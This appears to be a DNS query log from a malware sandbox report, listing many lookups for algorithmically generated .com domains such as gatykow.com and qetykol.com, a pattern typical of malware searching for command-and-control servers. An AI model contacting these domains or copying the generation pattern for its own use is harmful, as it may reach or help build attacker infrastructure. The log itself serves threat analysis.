                                                                                                                                                                                                              Aug 23, 2024 18:48:50.311537027 CEST192.168.2.41.1.1.10x8e6fStandard query (0)gatykow.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                              Aug 23, 2024 18:48:50.311553001 CEST192.168.2.41.1.1.10xec89Standard query (0)qetykol.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                              Aug 23, 2024 18:48:50.311737061 CEST192.168.2.41.1.1.10xd3ceStandard query (0)lyryjir.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                              Aug 23, 2024 18:48:50.311747074 CEST192.168.2.41.1.1.10xee03Standard query (0)puvybeg.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                              Aug 23, 2024 18:48:50.311927080 CEST192.168.2.41.1.1.10xf868Standard query (0)vojypuc.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                              Aug 23, 2024 18:48:50.311947107 CEST192.168.2.41.1.1.10xf991Standard query (0)vocybam.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                              Aug 23, 2024 18:48:50.312124014 CEST192.168.2.41.1.1.10x8bc3Standard query (0)qegytyv.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                              Aug 23, 2024 18:48:50.312166929 CEST192.168.2.41.1.1.10x27a7Standard query (0)gacyvah.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                              Aug 23, 2024 18:48:50.312354088 CEST192.168.2.41.1.1.10x4883Standard query (0)puryjil.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                              Aug 23, 2024 18:48:50.312580109 CEST192.168.2.41.1.1.10xb4b2Standard query (0)pufyxug.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                              Aug 23, 2024 18:48:50.312580109 CEST192.168.2.41.1.1.10x8fb6Standard query (0)gahypus.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                              Aug 23, 2024 18:48:50.312686920 CEST192.168.2.41.1.1.10x170Standard query (0)gaqyqis.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                              Aug 23, 2024 18:48:50.498559952 CEST192.168.2.41.1.1.10x3e3aStandard query (0)lygytyd.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                              Aug 23, 2024 18:48:50.499373913 CEST192.168.2.41.1.1.10xbf4cStandard query (0)vowyjut.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                              Aug 23, 2024 18:48:50.499552965 CEST192.168.2.41.1.1.10x163cStandard query (0)qexyvoq.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                              Aug 23, 2024 18:48:50.499881983 CEST192.168.2.41.1.1.10x23feStandard query (0)pufytev.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                              Aug 23, 2024 18:48:50.500304937 CEST192.168.2.41.1.1.10x6b23Standard query (0)gaqyhuz.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                              Aug 23, 2024 18:48:50.500679016 CEST192.168.2.41.1.1.10x2fdaStandard query (0)lyxyvoj.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                              Aug 23, 2024 18:48:50.500758886 CEST192.168.2.41.1.1.10x6ef9Standard query (0)vofyref.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                              Aug 23, 2024 18:48:50.501255989 CEST192.168.2.41.1.1.10xb291Standard query (0)puzyciq.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                              Aug 23, 2024 18:48:50.501286030 CEST192.168.2.41.1.1.10xf233Standard query (0)qeqyhup.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                              Aug 23, 2024 18:48:50.501773119 CEST192.168.2.41.1.1.10x4786Standard query (0)gadyrab.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                              Aug 23, 2024 18:48:50.502105951 CEST192.168.2.41.1.1.10xbda7Standard query (0)lymygyx.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                              Aug 23, 2024 18:48:50.502549887 CEST192.168.2.41.1.1.10xadb9Standard query (0)qedyrag.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                              Aug 23, 2024 18:48:50.502669096 CEST192.168.2.41.1.1.10xe2acStandard query (0)volycik.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                              Aug 23, 2024 18:48:50.503185034 CEST192.168.2.41.1.1.10x64a5Standard query (0)pumygyp.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                              Aug 23, 2024 18:48:50.503583908 CEST192.168.2.41.1.1.10xac12Standard query (0)galycuw.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                              Aug 23, 2024 18:48:50.503710032 CEST192.168.2.41.1.1.10xe526Standard query (0)lysywon.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                              Aug 23, 2024 18:48:50.504254103 CEST192.168.2.41.1.1.10x9403Standard query (0)vonygec.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                              Aug 23, 2024 18:48:50.504370928 CEST192.168.2.41.1.1.10xef20Standard query (0)pupywog.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                              Aug 23, 2024 18:48:50.504838943 CEST192.168.2.41.1.1.10x6f55Standard query (0)lykyxur.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                              Aug 23, 2024 18:48:50.505122900 CEST192.168.2.41.1.1.10xa96cStandard query (0)ganyfes.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                              Aug 23, 2024 18:48:50.505168915 CEST192.168.2.41.1.1.10x60d8Standard query (0)vopyqim.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                              Aug 23, 2024 18:48:50.505798101 CEST192.168.2.41.1.1.10x7969Standard query (0)qebyfav.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                              Aug 23, 2024 18:48:50.505896091 CEST192.168.2.41.1.1.10x58c5Standard query (0)pujyxyl.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                              Aug 23, 2024 18:48:50.506537914 CEST192.168.2.41.1.1.10x8c65Standard query (0)gatyqih.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                              Aug 23, 2024 18:48:50.507006884 CEST192.168.2.41.1.1.10x194Standard query (0)lyvyfad.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                              Aug 23, 2024 18:48:50.507255077 CEST192.168.2.41.1.1.10xbdc3Standard query (0)qetyquq.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                              Aug 23, 2024 18:48:50.507950068 CEST192.168.2.41.1.1.10x5f01Standard query (0)puvydov.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                              Aug 23, 2024 18:48:50.508038998 CEST192.168.2.41.1.1.10xbbbeStandard query (0)gahyzez.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                              Aug 23, 2024 18:48:50.508466959 CEST192.168.2.41.1.1.10xa296Standard query (0)lyrymuj.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                              Aug 23, 2024 18:48:50.508671045 CEST192.168.2.41.1.1.10x256eStandard query (0)vocydof.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                              Aug 23, 2024 18:48:50.509181976 CEST192.168.2.41.1.1.10x1baeStandard query (0)purymuq.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                              Aug 23, 2024 18:48:50.509229898 CEST192.168.2.41.1.1.10x5b50Standard query (0)qegylep.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                              Aug 23, 2024 18:48:50.509743929 CEST192.168.2.41.1.1.10x5a07Standard query (0)gacydib.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                              Aug 23, 2024 18:48:50.510235071 CEST192.168.2.41.1.1.10xdbc9Standard query (0)lygylax.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                              Aug 23, 2024 18:48:50.510345936 CEST192.168.2.41.1.1.10x2a59Standard query (0)vowymyk.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                              Aug 23, 2024 18:48:50.510802984 CEST192.168.2.41.1.1.10x68fStandard query (0)qexysig.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                              Aug 23, 2024 18:48:50.511387110 CEST192.168.2.41.1.1.10x907aStandard query (0)gaqynyw.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                              Aug 23, 2024 18:48:50.511432886 CEST192.168.2.41.1.1.10x329aStandard query (0)pufylap.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                              Aug 23, 2024 18:48:50.512129068 CEST192.168.2.41.1.1.10xcc68Standard query (0)vofykoc.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                              Aug 23, 2024 18:48:50.512542963 CEST192.168.2.41.1.1.10x6edbStandard query (0)lyxysun.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                              Aug 23, 2024 18:48:50.512662888 CEST192.168.2.41.1.1.10xff24Standard query (0)qeqynel.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                              Aug 23, 2024 18:48:50.513588905 CEST192.168.2.41.1.1.10xcb99Standard query (0)gadykos.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                              Aug 23, 2024 18:48:50.514260054 CEST192.168.2.41.1.1.10xb478Standard query (0)lymyner.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                              Aug 23, 2024 18:48:50.514585018 CEST192.168.2.41.1.1.10x5553Standard query (0)volypum.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                              Aug 23, 2024 18:48:50.515206099 CEST192.168.2.41.1.1.10xad8cStandard query (0)pumybal.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                              Aug 23, 2024 18:48:50.515240908 CEST192.168.2.41.1.1.10xf6a8Standard query (0)qedykiv.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                              Aug 23, 2024 18:48:50.516015053 CEST192.168.2.41.1.1.10x2a9Standard query (0)galypyh.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                              Aug 23, 2024 18:48:50.516330957 CEST192.168.2.41.1.1.10x225cStandard query (0)vonybat.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                              Aug 23, 2024 18:48:50.516606092 CEST192.168.2.41.1.1.10x1c74Standard query (0)lysyjid.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                              Aug 23, 2024 18:48:50.517291069 CEST192.168.2.41.1.1.10xbc93Standard query (0)qekytyq.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                              Aug 23, 2024 18:48:50.517923117 CEST192.168.2.41.1.1.10x4016Standard query (0)ganyvoz.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                              Aug 23, 2024 18:48:50.518013954 CEST192.168.2.41.1.1.10xfc52Standard query (0)pupyjuv.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                              Aug 23, 2024 18:48:50.519428015 CEST192.168.2.41.1.1.10xfa04Standard query (0)vopyjuf.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                              Aug 23, 2024 18:48:50.520927906 CEST192.168.2.41.1.1.10x8bd5Standard query (0)qekyxul.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                              Aug 23, 2024 18:48:50.521362066 CEST192.168.2.41.1.1.10x9b8aStandard query (0)lykytej.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                              Aug 23, 2024 18:48:50.521518946 CEST192.168.2.41.1.1.10x72c8Standard query (0)qebyvop.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                              Aug 23, 2024 18:48:50.521661997 CEST192.168.2.41.1.1.10xf4c2Standard query (0)pujyteq.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                              Aug 23, 2024 18:48:50.521934032 CEST192.168.2.41.1.1.10x4df3Standard query (0)gatyhub.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                              Aug 23, 2024 18:48:50.522136927 CEST192.168.2.41.1.1.10xb2ccStandard query (0)lyvyvix.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                              Aug 23, 2024 18:48:50.522313118 CEST192.168.2.41.1.1.10x5ed6Standard query (0)vojyrak.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                              Aug 23, 2024 18:48:50.522325993 CEST192.168.2.41.1.1.10x6e08Standard query (0)qetyhyg.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                              Aug 23, 2024 18:48:50.522577047 CEST192.168.2.41.1.1.10xd443Standard query (0)puvycip.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                              Aug 23, 2024 18:48:50.522730112 CEST192.168.2.41.1.1.10x4848Standard query (0)vojyzyt.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                              Aug 23, 2024 18:48:50.522823095 CEST192.168.2.41.1.1.10xc9e5Standard query (0)puzypug.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                              Aug 23, 2024 18:48:51.012039900 CEST192.168.2.41.1.1.10xe0f4Standard query (0)gatyhub.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                              Aug 23, 2024 18:48:51.013115883 CEST192.168.2.41.1.1.10x34d0Standard query (0)qetyhyg.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                              Aug 23, 2024 18:48:52.599138021 CEST192.168.2.41.1.1.10x6683Standard query (0)gahyraw.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                              Aug 23, 2024 18:48:52.600615978 CEST192.168.2.41.1.1.10x2206Standard query (0)lyrygyn.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                              Aug 23, 2024 18:48:52.601932049 CEST192.168.2.41.1.1.10xfdfdStandard query (0)vocycuc.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                              Aug 23, 2024 18:48:52.602658033 CEST192.168.2.41.1.1.10xc64eStandard query (0)qegyrol.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                              Aug 23, 2024 18:48:52.604034901 CEST192.168.2.41.1.1.10x34a4Standard query (0)purygeg.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                              Aug 23, 2024 18:48:52.604650974 CEST192.168.2.41.1.1.10x5302Standard query (0)gacycus.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                              Aug 23, 2024 18:48:52.606050968 CEST192.168.2.41.1.1.10xb2b6Standard query (0)lygywor.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                              Aug 23, 2024 18:48:52.606614113 CEST192.168.2.41.1.1.10xa4ceStandard query (0)vowygem.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                              Aug 23, 2024 18:48:52.608494997 CEST192.168.2.41.1.1.10x17baStandard query (0)qexyxuv.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                              Aug 23, 2024 18:48:52.609159946 CEST192.168.2.41.1.1.10xd83bStandard query (0)pufywil.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                              Aug 23, 2024 18:48:52.609886885 CEST192.168.2.41.1.1.10x5ce9Standard query (0)gaqyfah.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                              Aug 23, 2024 18:48:52.609899044 CEST192.168.2.41.1.1.10xc963Standard query (0)lyxyxyd.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                              Aug 23, 2024 18:48:52.610548973 CEST192.168.2.41.1.1.10xe8ffStandard query (0)qeqyfaq.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                              Aug 23, 2024 18:48:52.611964941 CEST192.168.2.41.1.1.10x823fStandard query (0)puzyxyv.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                              Aug 23, 2024 18:48:52.612175941 CEST192.168.2.41.1.1.10x78f2Standard query (0)gadyquz.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                              Aug 23, 2024 18:48:52.614048004 CEST192.168.2.41.1.1.10x41bStandard query (0)lymyfoj.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                              Aug 23, 2024 18:48:52.614059925 CEST192.168.2.41.1.1.10xc4ddStandard query (0)volyzef.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                              Aug 23, 2024 18:48:52.614207029 CEST192.168.2.41.1.1.10x3679Standard query (0)vofyqit.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                              Aug 23, 2024 18:48:52.614279985 CEST192.168.2.41.1.1.10xd0Standard query (0)pumydoq.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                              Aug 23, 2024 18:48:52.614582062 CEST192.168.2.41.1.1.10xab66Standard query (0)qedyqup.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                              Aug 23, 2024 18:48:52.614728928 CEST192.168.2.41.1.1.10xa9ecStandard query (0)lysymux.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                              Aug 23, 2024 18:48:52.614728928 CEST192.168.2.41.1.1.10x827fStandard query (0)galyzeb.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                              Aug 23, 2024 18:48:52.614800930 CEST192.168.2.41.1.1.10x2ef1Standard query (0)pupymyp.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                              Aug 23, 2024 18:48:52.614875078 CEST192.168.2.41.1.1.10x361bStandard query (0)vonydik.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                              Aug 23, 2024 18:48:52.614968061 CEST192.168.2.41.1.1.10xf641Standard query (0)ganydiw.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                              Aug 23, 2024 18:48:52.615046978 CEST192.168.2.41.1.1.10xd957Standard query (0)lykylan.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                              Aug 23, 2024 18:48:52.615144014 CEST192.168.2.41.1.1.10x9f04Standard query (0)vopymyc.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                              Aug 23, 2024 18:48:52.615314007 CEST192.168.2.41.1.1.10x140Standard query (0)pujylog.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                              Aug 23, 2024 18:48:52.615324974 CEST192.168.2.41.1.1.10x2be0Standard query (0)qebysul.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                              Aug 23, 2024 18:48:52.615504980 CEST192.168.2.41.1.1.10x6d96Standard query (0)lyvysur.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                              Aug 23, 2024 18:48:52.615561962 CEST192.168.2.41.1.1.10xae84Standard query (0)gatynes.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                              Aug 23, 2024 18:48:52.615675926 CEST192.168.2.41.1.1.10x26eaStandard query (0)vojykom.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                              Aug 23, 2024 18:48:52.615778923 CEST192.168.2.41.1.1.10xe3c0Standard query (0)qekylag.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                              Aug 23, 2024 18:48:52.616015911 CEST192.168.2.41.1.1.10x6cdfStandard query (0)qetynev.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                              Aug 23, 2024 18:48:52.616029024 CEST192.168.2.41.1.1.10x3e36Standard query (0)puvypul.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                              Aug 23, 2024 18:48:52.616267920 CEST192.168.2.41.1.1.10xb344Standard query (0)gahykih.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                              Aug 23, 2024 18:48:52.616327047 CEST192.168.2.41.1.1.10x2d1aStandard query (0)lyrynad.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                              Aug 23, 2024 18:48:52.616494894 CEST192.168.2.41.1.1.10x20feStandard query (0)vocypyt.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                              Aug 23, 2024 18:48:52.616729021 CEST192.168.2.41.1.1.10x4279Standard query (0)qegykiq.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                              Aug 23, 2024 18:48:52.616751909 CEST192.168.2.41.1.1.10x216Standard query (0)purybav.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                              Aug 23, 2024 18:48:52.616919994 CEST192.168.2.41.1.1.10x5628Standard query (0)gacypyz.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                              Aug 23, 2024 18:48:52.616959095 CEST192.168.2.41.1.1.10xb083Standard query (0)lygyjuj.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                              Aug 23, 2024 18:48:52.617146015 CEST192.168.2.41.1.1.10xeaf9Standard query (0)qexytep.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                              Aug 23, 2024 18:48:52.617146015 CEST192.168.2.41.1.1.10x685cStandard query (0)vowybof.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                              Aug 23, 2024 18:48:52.617296934 CEST192.168.2.41.1.1.10x583dStandard query (0)gaqyvob.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                              Aug 23, 2024 18:48:52.617337942 CEST192.168.2.41.1.1.10xeb7Standard query (0)lyxytex.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                              Aug 23, 2024 18:48:52.617503881 CEST192.168.2.41.1.1.10x928eStandard query (0)pufyjuq.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                              Aug 23, 2024 18:48:52.617503881 CEST192.168.2.41.1.1.10xa77dStandard query (0)vofyjuk.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                              Aug 23, 2024 18:48:52.617700100 CEST192.168.2.41.1.1.10xd3bStandard query (0)puzytap.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                              Aug 23, 2024 18:48:52.617712975 CEST192.168.2.41.1.1.10x503aStandard query (0)qeqyvig.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                              Aug 23, 2024 18:48:52.617902040 CEST192.168.2.41.1.1.10xa06dStandard query (0)gadyhyw.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                              Aug 23, 2024 18:48:52.617902040 CEST192.168.2.41.1.1.10x175bStandard query (0)lymyvin.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                              Aug 23, 2024 18:48:52.618071079 CEST192.168.2.41.1.1.10xe637Standard query (0)volyrac.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                              Aug 23, 2024 18:48:52.618109941 CEST192.168.2.41.1.1.10x40eaStandard query (0)qedyhyl.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                              Aug 23, 2024 18:48:52.618308067 CEST192.168.2.41.1.1.10xf14eStandard query (0)galyros.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                              Aug 23, 2024 18:48:52.618308067 CEST192.168.2.41.1.1.10xf81dStandard query (0)pumycug.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                              Aug 23, 2024 18:48:52.618495941 CEST192.168.2.41.1.1.10xa67eStandard query (0)lysyger.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                              Aug 23, 2024 18:48:52.618531942 CEST192.168.2.41.1.1.10x1626Standard query (0)vonycum.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                              Aug 23, 2024 18:48:52.618727922 CEST192.168.2.41.1.1.10x77faStandard query (0)qekyrov.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                              Aug 23, 2024 18:48:52.618727922 CEST192.168.2.41.1.1.10xebb2Standard query (0)pupygel.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                              Aug 23, 2024 18:48:52.618920088 CEST192.168.2.41.1.1.10x59fbStandard query (0)lykywid.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                              Aug 23, 2024 18:48:52.618951082 CEST192.168.2.41.1.1.10x9e85Standard query (0)ganycuh.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                              Aug 23, 2024 18:48:52.619103909 CEST192.168.2.41.1.1.10xa1dfStandard query (0)qebyxyq.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                              Aug 23, 2024 18:48:52.619158983 CEST192.168.2.41.1.1.10x24afStandard query (0)vopygat.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                              Aug 23, 2024 18:48:52.673079014 CEST192.168.2.41.1.1.10xb888Standard query (0)pujywiv.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                              Aug 23, 2024 18:48:52.673724890 CEST192.168.2.41.1.1.10xbcb8Standard query (0)gatyfaz.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                              Aug 23, 2024 18:48:52.674312115 CEST192.168.2.41.1.1.10x5646Standard query (0)lyvyxyj.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                              Aug 23, 2024 18:48:52.674839020 CEST192.168.2.41.1.1.10xb404Standard query (0)vojyquf.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                              Aug 23, 2024 18:48:52.675321102 CEST192.168.2.41.1.1.10x2719Standard query (0)puvyxeq.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                              Aug 23, 2024 18:48:52.675627947 CEST192.168.2.41.1.1.10xdec1Standard query (0)gahyqub.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                              Aug 23, 2024 18:48:52.675956964 CEST192.168.2.41.1.1.10xf44fStandard query (0)vocyzek.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                              Aug 23, 2024 18:48:52.676372051 CEST192.168.2.41.1.1.10xee43Standard query (0)qegyqug.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                              Aug 23, 2024 18:48:52.676424980 CEST192.168.2.41.1.1.10x2106Standard query (0)purydip.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                              Aug 23, 2024 18:48:52.676904917 CEST192.168.2.41.1.1.10x8eb8Standard query (0)lygymyn.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                              Aug 23, 2024 18:48:52.677122116 CEST192.168.2.41.1.1.10x6ccfStandard query (0)vowydic.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                              Aug 23, 2024 18:48:52.679119110 CEST192.168.2.41.1.1.10xa69eStandard query (0)qexylal.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                              Aug 23, 2024 18:48:52.679442883 CEST192.168.2.41.1.1.10xb3dStandard query (0)pufymyg.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                              Aug 23, 2024 18:48:52.680902958 CEST192.168.2.41.1.1.10x21f1Standard query (0)qetyfop.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                              Aug 23, 2024 18:48:52.681075096 CEST192.168.2.41.1.1.10x76edStandard query (0)lyryfox.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                              Aug 23, 2024 18:48:52.681075096 CEST192.168.2.41.1.1.10xc2c3Standard query (0)lyxylor.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                              Aug 23, 2024 18:48:52.681075096 CEST192.168.2.41.1.1.10x100cStandard query (0)gacyzaw.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                              Aug 23, 2024 18:48:52.681209087 CEST192.168.2.41.1.1.10xfb25Standard query (0)gaqydus.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                              Aug 23, 2024 18:48:52.681294918 CEST192.168.2.41.1.1.10x10a4Standard query (0)vofymem.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                              Aug 23, 2024 18:48:52.681415081 CEST192.168.2.41.1.1.10x256cStandard query (0)qeqysuv.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                              Aug 23, 2024 18:48:52.681449890 CEST192.168.2.41.1.1.10x9091Standard query (0)puzylol.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                              Aug 23, 2024 18:48:52.681648016 CEST192.168.2.41.1.1.10x429bStandard query (0)gadyneh.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                              Aug 23, 2024 18:48:52.681737900 CEST192.168.2.41.1.1.10xa439Standard query (0)lymysud.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                              Aug 23, 2024 18:48:52.681900024 CEST192.168.2.41.1.1.10x9146Standard query (0)volykit.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                              Aug 23, 2024 18:48:52.681941986 CEST192.168.2.41.1.1.10x5f27Standard query (0)qedynaq.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                              Aug 23, 2024 18:48:52.682158947 CEST192.168.2.41.1.1.10xe502Standard query (0)galykiz.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                              Aug 23, 2024 18:48:52.682188034 CEST192.168.2.41.1.1.10x8e29Standard query (0)pumypyv.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                              Aug 23, 2024 18:48:52.682337999 CEST192.168.2.41.1.1.10xa3ecStandard query (0)lysynaj.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                              Aug 23, 2024 18:48:52.682529926 CEST192.168.2.41.1.1.10x74d3Standard query (0)vonypyf.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                              Aug 23, 2024 18:48:52.682637930 CEST192.168.2.41.1.1.10x569aStandard query (0)qebyteg.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                              Aug 23, 2024 18:48:52.682779074 CEST192.168.2.41.1.1.10xf3b8Standard query (0)qekykup.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                              Aug 23, 2024 18:48:52.682842970 CEST192.168.2.41.1.1.10x91bbStandard query (0)pupyboq.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                              Aug 23, 2024 18:48:52.683024883 CEST192.168.2.41.1.1.10xa910Standard query (0)vopybok.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                              Aug 23, 2024 18:48:52.683036089 CEST192.168.2.41.1.1.10xcc74Standard query (0)lyvytan.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                              Aug 23, 2024 18:48:52.683228016 CEST192.168.2.41.1.1.10x7408Standard query (0)qetyvil.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                              Aug 23, 2024 18:48:52.683363914 CEST192.168.2.41.1.1.10x6e11Standard query (0)puvytag.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                              Aug 23, 2024 18:48:52.683398008 CEST192.168.2.41.1.1.10x584dStandard query (0)gahyhys.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                              Aug 23, 2024 18:48:52.683541059 CEST192.168.2.41.1.1.10xead7Standard query (0)lyryvur.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                              Aug 23, 2024 18:48:52.683792114 CEST192.168.2.41.1.1.10xc25fStandard query (0)vocyrom.comA (IP address)IN (0x0001)false
